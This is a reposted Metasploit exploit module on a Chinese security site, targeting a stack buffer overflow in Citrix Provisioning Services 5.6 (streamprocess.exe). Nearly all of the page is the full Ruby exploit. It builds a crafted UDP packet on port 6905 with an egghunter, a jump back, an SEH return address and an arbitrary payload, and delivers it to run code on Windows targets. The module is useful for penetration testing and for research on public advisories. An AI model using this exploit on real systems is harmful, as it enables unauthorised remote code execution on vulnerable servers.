首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Citrix Provisioning Services 5.6 streamprocess.exe Buffer Overflow
来源:http://www.metasploit.com 作者:mog 发布时间:2011-06-28  
##
# $Id: citrix_streamprocess.rb 13042 2011-06-27 18:00:12Z sinn3r $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = GoodRanking

	include Msf::Exploit::Remote::Udp
	include Msf::Exploit::Remote::Egghunter

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Citrix Provisioning Services 5.6 streamprocess.exe Buffer Overflow',
			'Description'    => %q{
					This module exploits a stack buffer overflow in Citrix Provisioning Services 5.6.
				By sending a specially crafted packet to the Provisioning Services server, a fixed
				length buffer on the stack can be overflowed and arbitrary code can be executed.
			},
			'Author'         => 'mog',
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 13042 
, 'References' => [ [ 'OSVDB', '70597'], [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-11-023/' ], [ 'URL', 'http://secunia.com/advisories/42954/' ], [ 'URL', 'http://support.citrix.com/article/CTX127149' ], ], 'DefaultOptions' => { # best at delaying/preventing target crashing post-exploit 'EXITFUNC' => 'process', 'InitialAutoRunScript' => 'migrate -f', }, 'Payload' => { 'BadChars' => "\x00", # Only "\x00\x00" breaks the overflow, but this is safer }, 'Platform' => 'win', 'Targets' => [ # pop/pop/ret in streamprocess.exe # Service runs and automatically shuts down in Win 7 [ 'Windows XP SP3 / Windows Server 2003 SP2 / Windows Vista', { 'Ret' => 0x00423d32 } ], ], 'Privileged' => true, 'DefaultTarget' => 0, 'DisclosureDate' => 'Jan 20 2011')) register_options([Opt::RPORT(6905)], self.class) end def exploit eggoptions = { :checksum => true, :eggtag => 'W00t', } hunter,egg = generate_egghunter(payload.encoded, payload_badchars, eggoptions) sploit = "\x10\x00\x02\x40" # message type sploit << rand_text_alpha_upper(30) sploit << "\x00\x01\x00\x00" # length field sploit << rand_text_alpha_upper(400) sploit << hunter sploit << rand_text_alpha_upper(64 - hunter.length) sploit << "\xEB\xBE" # Jump back 66 bytes to hunter because there's sploit << rand_text_alpha_upper(2) # only 24 bytes of cyclic copy after ret sploit << [target.ret].pack('V') # SE handler sploit << rand_text_alpha_upper(50) # Need >= 24 bytes to keep the tag out of the stack sploit << egg # Payload has a whole page to itself print_status("Trying target #{target.name}...") connect_udp udp_sock.put(sploit) print_status("Exploit sent, wait for egghunter.") select(nil, nil, nil, 4) # takes about 8 seconds in tests handler(udp_sock) disconnect_udp end end
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Smallftpd 1.0.3 FTP Server Den
·HP Data Protector 6.20 Multipl
·Valve Steam Client Application
·FreeAmp 2.0.7 .PLS File Buffer
·Microsoft Office Visio VISIODW
·Siemens FactoryLink 8 CSServic
·Lotus Notes 8.0.x - 8.5.2 FP2
·HTTrack Website Copier V3.44 D
·Free YouTube Download v2.10 DL
·Multiple vulnerabilities in HP
·Avira AntiVir Personal V10.00.
·HP Data Protector 6.20 EXEC_CM
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved